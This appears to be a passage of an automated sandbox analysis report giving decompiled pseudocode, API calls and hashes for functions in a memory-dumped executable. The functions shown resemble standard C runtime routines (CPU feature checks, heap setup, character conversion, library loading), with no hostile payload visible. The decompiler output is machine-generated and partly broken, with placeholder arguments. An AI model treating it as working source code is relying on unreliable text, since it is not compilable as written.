				 *((intOrPtr*)(_t75 + 4)) = _t73;
				 *((intOrPtr*)(_t75 + 8)) = 0;
				 *((intOrPtr*)(_t75 + 0xc)) = _t84;
				if((_v44 ^ 0x756e6547 | _v8 | _v12) != 0) {
					L9:
					_t91 =  *0x412b30; // 0x2
					L10:
					_v32 = _v36;
					_t59 = _v40;
					_v8 = _t59;
					_v28 = _t59;
					if(_v16 >= 7) {
						_t65 = 7;
						_push(_t75);
						asm("cpuid");
						_t77 =  &_v48;
						 *_t77 = _t65;
						 *((intOrPtr*)(_t77 + 4)) = _t75;
						 *((intOrPtr*)(_t77 + 8)) = 0;
						 *((intOrPtr*)(_t77 + 0xc)) = _t84;
						_t66 = _v44;
						_v24 = _t66;
						_t59 = _v8;
						if((_t66 & 0x00000200) != 0) {
							 *0x412b30 = _t91 | 0x00000002;
						}
					}
					if((_t59 & 0x00100000) != 0) {
						 *0x412030 =  *0x412030 | 0x00000004;
						 *0x412b2c = 2;
						if((_t59 & 0x08000000) != 0 && (_t59 & 0x10000000) != 0) {
							asm("xgetbv");
							_v20 = _t59;
							_v16 = _t84;
							if((_v20 & 0x00000006) == 6 && 0 == 0) {
								_t62 =  *0x412030; // 0x2f
								_t63 = _t62 | 0x00000008;
								 *0x412b2c = 3;
								 *0x412030 = _t63;
								if((_v24 & 0x00000020) != 0) {
									 *0x412b2c = 5;
									 *0x412030 = _t63 | 0x00000020;
								}
							}
						}
					}
					goto L20;
				}
				_t68 = _v48 & 0x0fff3ff0;
				if(_t68 == 0x106c0 || _t68 == 0x20660 || _t68 == 0x20670 || _t68 == 0x30650 || _t68 == 0x30660 || _t68 == 0x30670) {
					_t94 =  *0x412b30; // 0x2
					_t91 = _t94 | 0x00000001;
					 *0x412b30 = _t91;
					goto L10;
				} else {
					goto L9;
				}
			}

0x0040208d
0x00402090
0x0040209e
0x004020ad
0x0040222a
0x00402230
0x00402230
0x004020b3
0x004020b9
0x004020c4
0x004020ca
0x004020cd
0x004020ce
0x004020d2
0x004020d3
0x004020d5
0x004020d8
0x004020dd
0x004020e6
0x004020f7
0x00402102
0x00402108
0x00402109
0x00402111
0x00402117
0x00402119
0x0040211c
0x0040211f
0x00402122
0x00402167
0x00402167
0x0040216d
0x00402174
0x00402177
0x0040217a
0x0040217d
0x00402180
0x00402184
0x00402187
0x00402188
0x0040218d
0x00402190
0x00402192
0x00402195
0x00402198
0x0040219b
0x004021a3
0x004021a6
0x004021a9
0x004021ae
0x004021ae
0x004021a9
0x004021bb
0x004021bd
0x004021c4
0x004021d3
0x004021de
0x004021e1
0x004021e4
0x004021f5
0x004021fb
0x00402200
0x00402203
0x00402211
0x00402216
0x0040221b
0x00402225
0x00402225
0x00402216
0x004021f5
0x004021d3
0x00000000
0x004021bb
0x00402127
0x00402131
0x00402156
0x0040215c
0x0040215f
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004020A6

Strings

, xrefs: 0040220D

Memory Dump Source

Source File: 00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-3916222277
Opcode ID: b5824543732270ab0b84e6c6534a0c658c0f0c8495c1d5a659de4557b6608cfa
Instruction ID: 00a0b3a4e6e1703bd72bf57860e68eebd2cbb95fa7def28fde3004e4e54fdf29
Opcode Fuzzy Hash: b5824543732270ab0b84e6c6534a0c658c0f0c8495c1d5a659de4557b6608cfa
Instruction Fuzzy Hash: 02515AB19102099BDB15CFA9DA8979ABBF4FB08314F14C57AD804EB390D3B8A915CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004067FE, Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004067FE() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x4132b0 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x004067fe
0x00406806
0x0040680e

APIs

GetProcessHeap.KERNEL32 ref: 004067FE

Memory Dump Source

Source File: 00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
Instruction ID: ab0ad82ebdde72e163074a118323e5abeae2aeda4b6cf9790db401cd62e62c3c
Opcode Fuzzy Hash: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
Instruction Fuzzy Hash: F7A011B0200200CBC3008F38AA8820A3AA8AA08282308C2B8A008C00A0EB388088AA08

Uniqueness

Uniqueness Score: -1.00%

Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0x324e58d2
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080D8(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}

0x004078d4
0x004078d5
0x004078d6
0x004078dd
0x004078e2
0x004078e8
0x004078ee
0x004078f4
0x004078f7
0x004078f7
0x004078fa
0x004078fc
0x004078fc
0x004078fa
0x004078fe
0x00407903
0x0040790a
0x0040790d
0x0040790d
0x00407929
0x0040792f
0x00407934
0x00407ac7
0x00407ad2
0x00407ada
0x0040793a
0x0040793a
0x0040793d
0x00407942
0x00407946
0x0040799a
0x0040799a
0x0040799c
0x0040799e
0x00407abc
0x00407abc
0x00407abe
0x00407abf
0x00407ac5
0x00000000
0x00407ac5
0x004079af
0x004079b5
0x004079b7
0x00000000
0x00000000
0x004079bd
0x004079cf
0x004079d4
0x004079d8
0x00000000
0x00000000
0x004079e5
0x00407a1f
0x00407a22
0x00407a25
0x00407a27
0x00407a29
0x00407a2b
0x00407a77
0x00407a77
0x00407a79
0x00407a79
0x00407a7b
0x00407ab5
0x00407ab6
0x00000000
0x00407abb
0x00407a8f
0x00407a94
0x00407a96
0x00000000
0x00000000
0x00407a9a
0x00407a9b
0x00407a9c
0x00407a9f
0x00407adb
0x00407ade
0x00407aa1
0x00407aa1
0x00407aa2
0x00407aa2
0x00407aaf
0x00407ab1
0x00407ab3
0x00407ae4
0x00000000
0x00000000
0x00000000
0x00000000
0x00407ab3
0x00407a2d
0x00407a30
0x00407a32
0x00407a34
0x00407a36
0x00407a39
0x00407a3e
0x00407a59
0x00407a5b
0x00407a65
0x00407a67
0x00407a68
0x00407a6a
0x00000000
0x00000000
0x00407a6c
0x00407a72
0x00407a72
0x00000000
0x00407a72
0x00407a40
0x00407a42
0x00407a46
0x00407a4b
0x00407a4d
0x00407a4f
0x00000000
0x00000000
0x00407a51
0x00000000
0x00407a51
0x004079e7
0x004079ec
0x00000000
0x00000000
0x004079f2
0x004079f4
0x00000000
0x00000000
0x00407a10
0x00407a14
0x00000000
0x00000000
0x00000000
0x00407a1a
0x0040794d
0x0040794f
0x00407951
0x00407959
0x00407978
0x0040797a
0x00407984
0x00407986
0x00407987
0x00407989
0x00000000
0x00000000
0x0040798f
0x00407995
0x00407995
0x00000000
0x00407995
0x0040795d
0x00407961
0x00407966
0x0040796a
0x00000000
0x00000000
0x00407970
0x00000000
0x00407970

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
__alloca_probe_16.LIBCMT ref: 00407961
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
__alloca_probe_16.LIBCMT ref: 00407A46
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
__freea.LIBCMT ref: 00407AB6

Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

__freea.LIBCMT ref: 00407ABF
__freea.LIBCMT ref: 00407AE4

Memory Dump Source

Source File: 00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9

Uniqueness

Uniqueness Score: -1.00%

Function 00408223, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0x324e58d2
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}

0x0040822b
0x00408232
0x00408235
0x0040823d
0x00408241
0x0040824d
0x00408250
0x00408253
0x0040825a
0x00408262
0x00408265
0x0040826b
0x00408271
0x00408276
0x00408278
0x0040827b
0x00408280
0x0040828a
0x00408291
0x00408294
0x0040829b
0x004082a2
0x004082ce
0x004082f4
0x004082f6
0x00000000
0x004082d0
0x004082d3
0x0040839a
0x004083a6
0x004083b1
0x004083b6
0x004082d9
0x004082e0
0x004082e5
0x004082eb
0x004082f1
0x00000000
0x004082f1
0x004082eb
0x004082d3
0x004082a4
0x004082a8
0x004082ab
0x004082b1
0x004082b3
0x004082b6
0x004082ba
0x004082f7
0x004082fa
0x004082fb
0x00408300
0x00408306
0x0040830c
0x0040831b
0x00408321
0x00408327
0x0040832c
0x00408348
0x004083bb
0x004083c1
0x0040834a
0x00408352
0x0040835b
0x00408361
0x00000000
0x00408363
0x00408365
0x00408368
0x00408381
0x00000000
0x00408383
0x00408387
0x00408389
0x0040838c
0x00000000
0x0040838c
0x00408387
0x00408381
0x00408361
0x0040835b
0x00408348
0x0040832c
0x00408306
0x00000000
0x0040838f
0x0040838f
0x004083c3
0x004083cd
0x004083d5

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
__fassign.LIBCMT ref: 004082E0
__fassign.LIBCMT ref: 004082FB
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379

Memory Dump Source

Source File: 00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0x324e58d2
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}

0x00403639
0x00403640
0x00403643
0x00403647
0x00403652
0x0040365a
0x00403665
0x0040366b
0x0040366f
0x00403676
0x0040367c
0x0040367c
0x0040367e
0x00403683
0x00403688
0x00403688
0x00403693
0x0040369b

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688

Strings

CorExitProcess, xrefs: 0040365D
mscoree.dll, xrefs: 0040364B

Memory Dump Source

Source File: 00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98

Uniqueness

Uniqueness Score: -1.00%

Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0x324e58d2
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}

0x004062c0
0x004062c7
0x004062ca
0x004062d3
0x004062d8
0x004062dd
0x004062e2
0x004062e5
0x004062e7
0x004062e7
0x004062ec
0x00406305
0x0040630b
0x00406310
0x004063af
0x004063b3
0x004063b8
0x004063b8
0x004063cc
0x004063d4
0x004063d4
0x00406316
0x00406319
0x0040631e
0x00406322
0x0040636e
0x00406370
0x00406372
0x00406377
0x0040638e
0x00406396
0x004063a6
0x004063a6
0x00406396
0x004063a8
0x004063a9
0x00000000
0x004063ae
0x00406324
0x00406329
0x0040632b
0x0040632d
0x0040632d
0x00406335
0x00406352
0x0040635c
0x00406361
0x00000000
0x00000000
0x00406363
0x00406369
0x00406369
0x00000000
0x00406369
0x00406339
0x0040633d
0x00406342
0x00406346
0x00000000
0x00000000
0x00406348
0x00000000

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
__alloca_probe_16.LIBCMT ref: 0040633D
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
__freea.LIBCMT ref: 004063A9

Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

Memory Dump Source

Source File: 00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x324e58d3
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x00405756
0x0040575a
0x00405761
0x00405765
0x00405773
0x00405789
0x0040578d
0x004057b6
0x004057b8
0x004057bc
0x004057bf
0x004057bf
0x004057c5
0x004057c7
0x00000000
0x004057c8
0x0040578f
0x00405798
0x004057a7
0x0040579a
0x0040579d
0x004057a3
0x004057a3
0x004057ab
0x00000000
0x004057ad
0x004057b0
0x004057b2
0x00000000
0x004057b2
0x004057ab
0x00405767
0x0040576c
0x00000000

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D

Memory Dump Source

Source File: 00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8

Uniqueness

Uniqueness Score: -1.00%

Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0x7
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
